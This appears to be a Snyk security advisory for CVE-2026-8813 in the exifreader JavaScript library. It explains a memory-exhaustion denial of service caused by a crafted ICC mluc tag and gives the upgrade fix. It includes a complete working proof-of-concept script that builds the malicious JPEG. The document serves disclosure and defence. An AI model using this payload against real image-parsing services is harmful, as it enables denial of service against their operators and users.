Improper Validation of Specified Quantity in Input Affecting exifreader package, versions <4.39.0
Threat Intelligence
Snyk has a proof-of-concept or detailed explanation of how to exploit this vulnerability.
The probability is the direct output of the EPSS model, and conveys an overall sense of the threat of exploitation in the wild. The percentile measures the EPSS probability relative to all known EPSS scores. Note: This data is updated daily, relying on the latest available EPSS model version. Check out the EPSS documentation for more details.
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk IDSNYK-JS-EXIFREADER-16689335
- published18 May 2026
- disclosed6 May 2026
- creditYuki Matsuhashi
Introduced: 6 May 2026
NewCVE-2026-8813 (opens in a new tab)How to fix?
Upgrade exifreader to version 4.39.0 or higher.
Overview
exifreader is a Library that parses Exif metadata in images.
Affected versions of this package are vulnerable to Improper Validation of Specified Quantity in Input. A crafted image containing an ICC mluc tag can set an attacker-controlled record count together with a zero record size. During parsing, ExifReader repeatedly processes the same record and appends entries to an array without sufficient bounds validation, causing excessive memory growth. In applications that parse attacker-supplied images, this may lead to denial of service through memory exhaustion.
PoC
import ExifReader from 'exifreader'
const icc = Buffer.alloc(200)
// ICC profile header
icc.writeUInt32BE(icc.length, 0) // profile size
icc.write('acsp', 36, 'ascii') // ICC signature
// ICC tag table
icc.writeUInt32BE(1, 128) // tag count = 1
icc.write('abcd', 132, 'ascii') // tag signature
icc.writeUInt32BE(144, 136) // tag offset
icc.writeUInt32BE(40, 140) // tag size
// ICC "mluc" tag: multiLocalizedUnicodeType
icc.write('mluc', 144, 'ascii') // tag type
icc.writeUInt32BE(0, 148) // reserved
icc.writeUInt32BE(0x7fffffff, 152) // numRecords: huge loop count
icc.writeUInt32BE(0, 156) // recordSize = 0, so offset never advances
// First mluc record; repeatedly reread because recordSize is 0
icc.write('enUS', 160, 'ascii') // language + country
icc.writeUInt32BE(0, 164) // textLength
icc.writeUInt32BE(0, 168) // textOffset
const payload = Buffer.concat([
Buffer.from('ICC_PROFILE\0', 'binary'), // JPEG APP2 ICC identifier
Buffer.from([1, 1]), // chunk number = 1, total chunks = 1
icc
])
const app2Length = payload.length + 2
const jpeg = Buffer.concat([
Buffer.from([0xff, 0xd8]), // JPEG SOI
Buffer.from([0xff, 0xe2, app2Length >> 8, app2Length & 0xff]), // APP2 marker + length
payload,
Buffer.from([0xff, 0xda, 0x00, 0x0c]) // SOS marker
])
ExifReader.load(jpeg)